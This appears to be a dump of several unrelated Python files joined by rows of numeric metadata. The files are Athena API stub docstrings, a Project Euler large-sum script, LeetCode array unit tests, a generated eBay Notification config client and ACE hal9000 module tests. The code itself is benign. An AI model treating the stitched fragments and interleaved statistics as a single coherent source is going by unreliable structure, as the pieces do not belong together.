    Each summary carries the workgroup's name, state, description, and
    creation timestamp.

    Raises Athena.Client.exceptions.InternalServerException and
    Athena.Client.exceptions.InvalidRequestException.
    """
    pass
def start_query_execution(QueryString=None, ClientRequestToken=None, QueryExecutionContext=None, ResultConfiguration=None, WorkGroup=None):
    """Run the SQL statements in *QueryString*.

    Requires access to the workgroup in which the query runs.
    See also: AWS API Documentation.

    :type QueryString: string
    :param QueryString: [REQUIRED]\nThe SQL query statements to be executed.\n
    :type ClientRequestToken: string
    :param ClientRequestToken: Case-sensitive idempotency token; a repeated request with the same token returns the original response instead of starting a new query. Autopopulated by the SDK when not provided; callers bypassing the SDK/CLI must supply it.
    :type QueryExecutionContext: dict
    :param QueryExecutionContext: The database within which the query executes.\n\nDatabase (string) --The name of the database.\n
    :type ResultConfiguration: dict
    :param ResultConfiguration: Where and how query results are stored.\n\nOutputLocation (string) --S3 location for results, e.g. s3://path/to/query/bucket/ . Required here or in the workgroup configuration; workgroup settings may override this client-side setting (see WorkGroupConfiguration$EnforceWorkGroupConfiguration).\n\nEncryptionConfiguration (dict) --Client-side result-encryption settings, overridable by the workgroup.\n\nEncryptionOption (string) -- [REQUIRED]One of SSE_S3, SSE_KMS, or CSE_KMS.\n\nKmsKey (string) --KMS key ARN or ID for SSE-KMS and CSE-KMS.\n
    :type WorkGroup: string
    :param WorkGroup: The name of the workgroup in which the query is being started.
    :rtype: dict
    :return: {
        'QueryExecutionId': 'string'
    }

    Raises Athena.Client.exceptions.InternalServerException,
    Athena.Client.exceptions.InvalidRequestException, and
    Athena.Client.exceptions.TooManyRequestsException.
    """
    pass
def stop_query_execution(QueryExecutionId=None):
    """Stop a running query execution.

    Requires access to the workgroup in which the query ran.
    See also: AWS API Documentation.

    :type QueryExecutionId: string
    :param QueryExecutionId: [REQUIRED]\nThe unique ID of the query execution to stop.\nThis field is autopopulated if not provided.\n
    :rtype: dict
    :return: {}

    Raises Athena.Client.exceptions.InternalServerException and
    Athena.Client.exceptions.InvalidRequestException.
    """
    pass
def tag_resource(ResourceARN=None, Tags=None):
    """Attach one or more tags to a resource such as a workgroup.

    A tag is a user-defined key with an optional value (key: 1-128 UTF-8
    characters, value: 0-256 UTF-8 characters; both case-sensitive, keys
    unique per resource) used to categorize and filter resources.
    See also: AWS API Documentation.

    :type ResourceARN: string
    :param ResourceARN: [REQUIRED]\nARN of the resource (such as a workgroup) to tag.\n
    :type Tags: list
    :param Tags: [REQUIRED]\nOne or more tags to add.\n\n(dict) --A tag.\n\nKey (string) --The tag key.\n\nValue (string) --The tag value.\n
    :rtype: dict
    :return: {}

    Raises Athena.Client.exceptions.InternalServerException,
    Athena.Client.exceptions.InvalidRequestException, and
    Athena.Client.exceptions.ResourceNotFoundException.
    """
    pass
def untag_resource(ResourceARN=None, TagKeys=None):
    """Remove one or more tags from a workgroup resource.

    Takes a list of tag-key strings and removes all of their tags in a
    single call.
    See also: AWS API Documentation.

    :type ResourceARN: string
    :param ResourceARN: [REQUIRED]\nARN of the workgroup resource to untag.\n
    :type TagKeys: list
    :param TagKeys: [REQUIRED]\nTag keys whose tags are removed from the resource.\n\n(string) --\n
    :rtype: dict
    :return: {}

    Raises Athena.Client.exceptions.InternalServerException,
    Athena.Client.exceptions.InvalidRequestException, and
    Athena.Client.exceptions.ResourceNotFoundException.
    """
    pass
def update_work_group(WorkGroup=None, Description=None, ConfigurationUpdates=None, State=None):
    """Update the named workgroup; the workgroup's name cannot be changed.

    See also: AWS API Documentation.

    :type WorkGroup: string
    :param WorkGroup: [REQUIRED]\nThe specified workgroup that will be updated.\n
    :type Description: string
    :param Description: The workgroup description.
    :type ConfigurationUpdates: dict
    :param ConfigurationUpdates: Configuration changes to apply.\n\nEnforceWorkGroupConfiguration (boolean) --Whether workgroup settings override client-side settings.\n\nResultConfigurationUpdates (dict) --Updated results location and encryption option.\n\nOutputLocation (string) --S3 location for query results, e.g. s3://path/to/query/bucket/ .\n\nRemoveOutputLocation (boolean) --When true, clears the previously specified client-side results location.\n\nEncryptionConfiguration (dict) --Result-encryption settings.\n\nEncryptionOption (string) -- [REQUIRED]One of SSE_S3, SSE_KMS, or CSE_KMS.\n\nKmsKey (string) --KMS key ARN or ID for SSE-KMS and CSE-KMS.\n\nRemoveEncryptionConfiguration (boolean) --When true, clears the previously specified client-side encryption configuration.\n\nPublishCloudWatchMetricsEnabled (boolean) --Whether the workgroup publishes metrics to CloudWatch.\n\nBytesScannedCutoffPerQuery (integer) --Upper limit of bytes a single query may scan.\n\nRemoveBytesScannedCutoffPerQuery (boolean) --Removes the per-query data-usage limit.\n\nRequesterPaysEnabled (boolean) --Whether members may query S3 Requester Pays buckets; defaults to false.\n
    :type State: string
    :param State: The workgroup state that will be updated for the given workgroup.
    :rtype: dict
    :return: {}

    Raises Athena.Client.exceptions.InternalServerException and
    Athena.Client.exceptions.InvalidRequestException.
    """
    pass
| 39.56517
| 3,846
| 0.699181
| 8,777
| 72,246
| 5.739091
| 0.077019
| 0.020646
| 0.027079
| 0.025014
| 0.817815
| 0.794231
| 0.778845
| 0.753792
| 0.736302
| 0.728877
| 0
| 0.006084
| 0.228732
| 72,246
| 1,825
| 3,847
| 39.586849
| 0.89792
| 0.969728
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
aa86014d9bec52a8e02ab3027ebcc87b83f96443
| 5,265
|
py
|
Python
|
python/p13.py
|
luizfranca/project-euler
|
9bd43954283ecf27c61303b7004f24df5dddcabe
|
[
"MIT"
] | null | null | null |
python/p13.py
|
luizfranca/project-euler
|
9bd43954283ecf27c61303b7004f24df5dddcabe
|
[
"MIT"
] | null | null | null |
python/p13.py
|
luizfranca/project-euler
|
9bd43954283ecf27c61303b7004f24df5dddcabe
|
[
"MIT"
] | null | null | null |
# Project Euler
# Problem 13 (the original header said "Problem 12" by mistake)
# Large sum: work out the first ten digits of the sum of the following
# one hundred 50-digit numbers.

# One hundred 50-digit numbers, concatenated into a single 5000-character
# digit string once the newlines are stripped.
number = """
37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690""".replace("\n", "")

# Sum each 50-character slice as an integer.
s = 0
for i in range(100):
    s += int(number[i * 50: (i + 1) * 50])

# Print the first ten digits of the sum. The original used the Python 2
# print statement (`print str(s)[:10]`), which is a SyntaxError on
# Python 3; the call form below works on both Python 2 and Python 3.
print(str(s)[:10])
| 46.184211
| 71
| 0.966192
| 128
| 5,265
| 39.742188
| 0.953125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.977765
| 0.026211
| 5,265
| 114
| 72
| 46.184211
| 0.014433
| 0.006458
| 0
| 0
| 0
| 0
| 0.975899
| 0.956389
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.009524
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa8e7e4e868d0d3eb8db5039b1b78fc6733322c6
| 8,273
|
py
|
Python
|
tests/arrays/test_leetcode_arrays_solution.py
|
nutshellfool/algorithmPlayground_python
|
cb3a56a879ad5edc526a09c750c073596bb956d4
|
[
"MIT"
] | null | null | null |
tests/arrays/test_leetcode_arrays_solution.py
|
nutshellfool/algorithmPlayground_python
|
cb3a56a879ad5edc526a09c750c073596bb956d4
|
[
"MIT"
] | null | null | null |
tests/arrays/test_leetcode_arrays_solution.py
|
nutshellfool/algorithmPlayground_python
|
cb3a56a879ad5edc526a09c750c073596bb956d4
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from src.arrays.leetcode_arrays_solution import Solution
class TestArrayLeetCodeSolution(TestCase):
def setUp(self):
self.solution = Solution()
def test_maxArea(self):
height = [1, 8, 6, 2, 5, 4, 8, 3, 7]
max_area = self.solution.maxArea(height)
self.assertIsNotNone(max_area)
self.assertEqual(49, max_area)
def test_maxArea_none_params(self):
max_area = self.solution.maxArea(None)
self.assertIsNotNone(max_area)
self.assertEqual(0, max_area)
def test_maxArea_params_length_less_than_3(self):
max_area = self.solution.maxArea([1, 2])
self.assertIsNotNone(max_area)
self.assertEqual(0, max_area)
def test_maxArea_params_length_equals_3(self):
max_area = self.solution.maxArea([1, 1, 1])
self.assertIsNotNone(max_area)
self.assertEqual(2, max_area)
def test_maxArea_brutal_force(self):
height = [1, 8, 6, 2, 5, 4, 8, 3, 7]
max_area = self.solution.maxArea_brutal_force(height)
self.assertIsNotNone(max_area)
self.assertEqual(49, max_area)
def test_maxArea_brutal_force_none_params(self):
max_area = self.solution.maxArea_brutal_force(None)
self.assertIsNotNone(max_area)
self.assertEqual(0, max_area)
def test_maxArea_brutal_force_params_length_less_than_3(self):
max_area = self.solution.maxArea_brutal_force([1, 2])
self.assertIsNotNone(max_area)
self.assertEqual(0, max_area)
def test_maxArea_brutal_force_params_length_equals_3(self):
max_area = self.solution.maxArea_brutal_force([1, 1, 1])
self.assertIsNotNone(max_area)
self.assertEqual(2, max_area)
def test_trap_brutal_force(self):
height = [0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1]
unit_of_trapped = self.solution.trap_brutal_force(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(6, unit_of_trapped)
def test_trap_brutal_force_none_params(self):
unit_of_trapped = self.solution.trap_brutal_force(None)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_brutal_force_empty_params(self):
unit_of_trapped = self.solution.trap_brutal_force([])
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_brutal_force_params_length_less_than_3(self):
height = [2, 1]
unit_of_trapped = self.solution.trap_brutal_force(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_brutal_force_params_length_equals_3(self):
height = [2, 1, 2]
unit_of_trapped = self.solution.trap_brutal_force(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(1, unit_of_trapped)
def test_trap(self):
height = [0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1]
unit_of_trapped = self.solution.trap(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(6, unit_of_trapped)
def test_trap_none_params(self):
unit_of_trapped = self.solution.trap(None)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_empty_params(self):
unit_of_trapped = self.solution.trap([])
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_params_length_less_than_3(self):
height = [2, 1]
unit_of_trapped = self.solution.trap(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_params_length_equals_3(self):
height = [2, 1, 2]
unit_of_trapped = self.solution.trap(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(1, unit_of_trapped)
def test_trap_dynamic_programming(self):
height = [0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1]
unit_of_trapped = self.solution.trap_dynamic_programming(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(6, unit_of_trapped)
def test_trap_dynamic_programming_none_params(self):
unit_of_trapped = self.solution.trap_dynamic_programming(None)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_dynamic_programming_empty_params(self):
unit_of_trapped = self.solution.trap_dynamic_programming([])
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_dynamic_programming_params_length_less_than_3(self):
height = [2, 1]
unit_of_trapped = self.solution.trap_dynamic_programming(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_dynamic_programming_params_length_equals_3(self):
height = [2, 1, 2]
unit_of_trapped = self.solution.trap_dynamic_programming(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(1, unit_of_trapped)
def test_sortColors(self):
    """sortColors orders a mixed 0/1/2 array into sorted Dutch-flag form."""
    result = self.solution.sortColors([2, 0, 2, 1, 1, 0])
    self.assertIsNotNone(result)
    self.assertEqual(6, len(result))
    self.assertEqual([0, 0, 1, 1, 2, 2], result)

def test_sortColors_None(self):
    """sortColors(None) is expected to return None rather than raise."""
    self.assertIsNone(self.solution.sortColors(None))

def test_sortColors_empty(self):
    """Sorting an empty list yields an empty (but non-None) result."""
    result = self.solution.sortColors([])
    self.assertIsNotNone(result)
    self.assertEqual(0, len(result))

def test_sortColors_instinct(self):
    """The 'instinct' variant must produce the same sorted output."""
    result = self.solution.sortColors_instinct([2, 0, 2, 1, 1, 0])
    self.assertIsNotNone(result)
    self.assertEqual(6, len(result))
    self.assertEqual([0, 0, 1, 1, 2, 2], result)

def test_sortColors_instinct_None(self):
    """sortColors_instinct(None) is expected to return None."""
    self.assertIsNone(self.solution.sortColors_instinct(None))

def test_sortColors_instinct_empty(self):
    """The 'instinct' variant also returns an empty result for empty input."""
    result = self.solution.sortColors_instinct([])
    self.assertIsNotNone(result)
    self.assertEqual(0, len(result))
def test_moveZeroes(self):
    """moveZeroes shifts zeros to the tail in place, keeping other order."""
    values = [0, 1, 0, 3, 12]
    self.solution.moveZeroes(values)
    self.assertIsNotNone(values)
    self.assertEqual([1, 3, 12, 0, 0], values)

def test_moveZeroes1(self):
    """Relative order of the non-zero elements must be preserved."""
    values = [0, 3, 0, 1, 12]
    self.solution.moveZeroes(values)
    self.assertIsNotNone(values)
    self.assertEqual([3, 1, 12, 0, 0], values)
def test_removeDuplicates(self):
    """removeDuplicates returns the count of unique leading elements."""
    values = [1, 1, 2]
    unique_count = self.solution.removeDuplicates(values)
    self.assertIsNotNone(values)
    self.assertEqual(2, unique_count)

def test_removeDuplicates1(self):
    """A longer sorted array with runs collapses to its distinct count."""
    values = [0, 0, 1, 1, 1, 2, 2, 3, 3, 4]
    unique_count = self.solution.removeDuplicates(values)
    self.assertIsNotNone(values)
    self.assertEqual(5, unique_count)
def test_maxEnvelopes(self):
    """Classic Russian-doll example: the longest nesting chain has length 3."""
    count = self.solution.maxEnvelopes([[5, 4], [6, 4], [6, 7], [2, 3]])
    self.assertEqual(3, count)

def test_maxEnvelopes1(self):
    """Equal widths cannot nest; the best chain here has length 4."""
    count = self.solution.maxEnvelopes([[4, 5], [4, 6], [6, 7], [2, 3], [1, 1]])
    self.assertEqual(4, count)
def test_merge(self):
    """Overlapping intervals [1,3] and [2,6] collapse into [1,6]."""
    merged = self.solution.merge([[1, 3], [2, 6], [8, 10], [15, 18]])
    self.assertEqual([[1, 6], [8, 10], [15, 18]], merged)

def test_merge1(self):
    """Intervals touching at an endpoint ([1,4] and [4,6]) also merge."""
    merged = self.solution.merge([[1, 4], [4, 6]])
    self.assertEqual([[1, 6]], merged)

def test_merge_none(self):
    """merge(None) returns None rather than raising."""
    self.assertIsNone(self.solution.merge(None))

def test_merge_empty(self):
    """merge([]) also returns None in this implementation."""
    self.assertIsNone(self.solution.merge([]))
| 37.265766
| 72
| 0.677143
| 1,083
| 8,273
| 4.834718
| 0.064635
| 0.051566
| 0.111727
| 0.097403
| 0.894194
| 0.87796
| 0.863827
| 0.821429
| 0.75382
| 0.733766
| 0
| 0.035742
| 0.218784
| 8,273
| 221
| 73
| 37.434389
| 0.774408
| 0
| 0
| 0.539326
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.404494
| 1
| 0.224719
| false
| 0
| 0.011236
| 0
| 0.241573
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
aa9c7569a27d69570cd01db2ef721bf49ae91caf
| 7,787
|
py
|
Python
|
src/ebay_rest/api/commerce_notification/api/config_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
src/ebay_rest/api/commerce_notification/api/config_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
src/ebay_rest/api/commerce_notification/api/config_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Notification API
The eBay Notification API enables management of the entire end-to-end eBay notification experience by allowing users to:<ul><li>Browse for supported notification topics and retrieve topic details</li><li>Create, configure, and manage notification destination endpionts</li><li>Configure, manage, and test notification subscriptions</li><li>Process eBay notifications and verify the integrity of the message payload</li></ul> # noqa: E501
OpenAPI spec version: v1.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ...commerce_notification.api_client import ApiClient
class ConfigApi(object):
    """Client for the eBay Notification API ``/config`` endpoint.

    NOTE: originally produced by the swagger code generator program
    (https://github.com/swagger-api/swagger-codegen); this is a hand-restyled
    but behaviorally identical version.
    """

    # Keyword arguments accepted by every *_with_http_info method; anything
    # else raises TypeError, mirroring the generated validation loop.
    _COMMON_PARAMS = ('async_req', '_return_http_data_only',
                      '_preload_content', '_request_timeout')

    def __init__(self, api_client=None):
        # Fall back to a default ApiClient when the caller supplies none.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def get_config(self, **kwargs):  # noqa: E501
        """get_config  # noqa: E501

        This method allows applications to retrieve a previously created
        configuration.  # noqa: E501

        Synchronous by default; pass ``async_req=True`` to get the request
        thread instead of the decoded response.

        :param async_req bool
        :return: Config
            If the method is called asynchronously,
            returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_config_with_http_info(**kwargs)  # noqa: E501
        # Synchronous path: unwrap and return the data directly.
        return self.get_config_with_http_info(**kwargs)  # noqa: E501

    def get_config_with_http_info(self, **kwargs):  # noqa: E501
        """get_config  # noqa: E501

        This method allows applications to retrieve a previously created
        configuration.  # noqa: E501

        :param async_req bool
        :return: Config
            If the method is called asynchronously,
            returns the request thread.
        """
        # Reject unknown keyword arguments with the same message the
        # generated code produced.
        for key in kwargs:
            if key not in self._COMMON_PARAMS:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_config" % key
                )

        header_params = {
            # HTTP header `Accept`
            'Accept': self.api_client.select_header_accept(
                ['application/json']),  # noqa: E501
        }

        return self.api_client.call_api(
            '/config', 'GET',
            {},                       # path params
            [],                       # query params
            header_params,
            body=None,
            post_params=[],
            files={},
            response_type='Config',   # noqa: E501
            auth_settings=['api_auth'],  # noqa: E501
            async_req=kwargs.get('async_req'),
            _return_http_data_only=kwargs.get('_return_http_data_only'),
            _preload_content=kwargs.get('_preload_content', True),
            _request_timeout=kwargs.get('_request_timeout'),
            collection_formats={})

    def update_config(self, **kwargs):  # noqa: E501
        """update_config  # noqa: E501

        This method allows applications to create a new configuration or
        update an existing configuration. This app-level configuration allows
        developers to set up alerts.  # noqa: E501

        Synchronous by default; pass ``async_req=True`` to get the request
        thread instead of the decoded response.

        :param async_req bool
        :param Config body: The configurations for this application.
        :return: None
            If the method is called asynchronously,
            returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.update_config_with_http_info(**kwargs)  # noqa: E501
        # Synchronous path: unwrap and return the data directly.
        return self.update_config_with_http_info(**kwargs)  # noqa: E501

    def update_config_with_http_info(self, **kwargs):  # noqa: E501
        """update_config  # noqa: E501

        This method allows applications to create a new configuration or
        update an existing configuration. This app-level configuration allows
        developers to set up alerts.  # noqa: E501

        :param async_req bool
        :param Config body: The configurations for this application.
        :return: None
            If the method is called asynchronously,
            returns the request thread.
        """
        allowed = ('body',) + self._COMMON_PARAMS
        for key in kwargs:
            if key not in allowed:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_config" % key
                )

        header_params = {
            # HTTP header `Content-Type`
            'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
                ['application/json']),  # noqa: E501
        }

        return self.api_client.call_api(
            '/config', 'PUT',
            {},                       # path params
            [],                       # query params
            header_params,
            body=kwargs.get('body'),
            post_params=[],
            files={},
            response_type=None,       # noqa: E501
            auth_settings=['api_auth'],  # noqa: E501
            async_req=kwargs.get('async_req'),
            _return_http_data_only=kwargs.get('_return_http_data_only'),
            _preload_content=kwargs.get('_preload_content', True),
            _request_timeout=kwargs.get('_request_timeout'),
            collection_formats={})
| 36.731132
| 442
| 0.621163
| 908
| 7,787
| 5.10022
| 0.197137
| 0.044915
| 0.024185
| 0.031095
| 0.800043
| 0.784712
| 0.784712
| 0.768301
| 0.760527
| 0.75664
| 0
| 0.015824
| 0.293951
| 7,787
| 211
| 443
| 36.905213
| 0.826482
| 0.402979
| 0
| 0.704762
| 0
| 0
| 0.133886
| 0.03128
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.038095
| 0
| 0.152381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aacc6003dda7d0f113232d2ad8f543a975d4a6fa
| 13,098
|
py
|
Python
|
lib/saq/modules/test_hal9000.py
|
krayzpipes/ACE-1
|
138bf2aecad949f0b72b66519c32893df033de39
|
[
"Apache-2.0"
] | 28
|
2018-08-08T11:57:31.000Z
|
2022-01-12T23:06:18.000Z
|
lib/saq/modules/test_hal9000.py
|
krayzpipes/ACE-1
|
138bf2aecad949f0b72b66519c32893df033de39
|
[
"Apache-2.0"
] | 108
|
2018-08-08T12:35:06.000Z
|
2019-07-19T22:57:19.000Z
|
lib/saq/modules/test_hal9000.py
|
krayzpipes/ACE-1
|
138bf2aecad949f0b72b66519c32893df033de39
|
[
"Apache-2.0"
] | 16
|
2018-08-03T18:48:00.000Z
|
2021-11-09T00:35:35.000Z
|
# vim: sw=4:ts=4:et
import logging
import saq
import saq.database
import saq.test
from saq.analysis import RootAnalysis
from saq.database import use_db, get_db_connection, set_dispositions
from saq.constants import *
from saq.test import *
from saq.util import *
from .hal9000 import HAL9000Analysis, _compute_hal9000_md5, \
KEY_MAL_COUNT, KEY_TOTAL_COUNT, STATE_KEY_ID_TRACKING, STATE_KEY_PREVIOUS_DISPOSITION
class TestCase(ACEModuleTestCase):
    """Integration tests for the hal9000 analysis module.

    Each test drives a full TestEngine run, then inspects both the analysis
    result attached to the observable and the counters in the backing
    ``hal9000`` database (``observables.total_count`` / ``mal_count``).

    Fix: the deprecated ``assertEquals`` alias (removed in Python 3.12) has
    been replaced with ``assertEqual`` throughout; no test logic changed.
    """

    @use_db(name='hal9000')
    def test_hal9000_no_alert(self, db, c):
        # A plain analysis run (no alert): the observable should be counted
        # once with a zero malicious count.
        root = create_root_analysis(analysis_mode=ANALYSIS_MODE_ANALYSIS)
        root.initialize_storage()
        test_observable = root.add_observable(F_TEST, 'test')
        root.save()
        root.schedule()

        engine = TestEngine(local_analysis_modes=[ ANALYSIS_MODE_ANALYSIS ])
        #engine.set_cleanup(ANALYSIS_MODE_ANALYSIS, False)
        engine.enable_module('analysis_module_hal9000', ANALYSIS_MODE_ANALYSIS)
        engine.controlled_stop()
        engine.start()
        engine.wait()

        # no alert fired, so the storage directory was cleaned up
        self.assertFalse(os.path.exists(root.storage_dir))

        c.execute("SELECT total_count, mal_count FROM observables")
        rows = c.fetchall()
        self.assertEqual(len(rows), 1)
        result = rows[0]
        self.assertIsNotNone(result)
        self.assertEqual(result[0], 1)
        self.assertEqual(result[1], 0)

    @use_db(name='hal9000')
    def test_hal9000_alert_no_disposition(self, db, c):
        # same as above except we end up alerting
        root = create_root_analysis(analysis_mode=ANALYSIS_MODE_ANALYSIS)
        root.initialize_storage()
        test_observable = root.add_observable(F_TEST, 'test')
        root.save()
        root.schedule()

        engine = TestEngine(local_analysis_modes=[ ANALYSIS_MODE_ANALYSIS, ANALYSIS_MODE_CORRELATION ])
        engine.enable_alerting()
        engine.set_cleanup(ANALYSIS_MODE_ANALYSIS, False)
        engine.enable_module('analysis_module_forced_detection', ANALYSIS_MODE_ANALYSIS)
        engine.enable_module('analysis_module_hal9000', [ ANALYSIS_MODE_ANALYSIS, ANALYSIS_MODE_CORRELATION ])
        engine.controlled_stop()
        engine.start()
        engine.wait()

        root = RootAnalysis(storage_dir=storage_dir_from_uuid(root.uuid))
        root.load()

        # make sure we alerted
        self.assertEqual(root.analysis_mode, ANALYSIS_MODE_CORRELATION)

        test_observable = root.get_observable(test_observable.id)
        self.assertIsNotNone(test_observable)
        analysis = test_observable.get_analysis(HAL9000Analysis)
        self.assertIsNotNone(analysis)

        # total count and mal count should both be 0
        self.assertEqual(analysis.total_count, 0)
        self.assertEqual(analysis.mal_count, 0)

        # we should have a single entry in the database for this observable
        hal9000_id = _compute_hal9000_md5(test_observable)

        # since we have NOT set a disposition yet we should have nothing in the database about it
        c.execute("SELECT total_count, mal_count FROM observables WHERE id = UNHEX(%s)", (hal9000_id,))
        result = c.fetchone()
        self.assertIsNone(result)

        # verify the correct state is kept
        state = root.state['hal9000']
        self.assertTrue(STATE_KEY_ID_TRACKING in state)
        tracking = state[STATE_KEY_ID_TRACKING]
        self.assertTrue(hal9000_id in tracking)
        tracking_info = tracking[hal9000_id]
        self.assertTrue('id' in tracking_info)
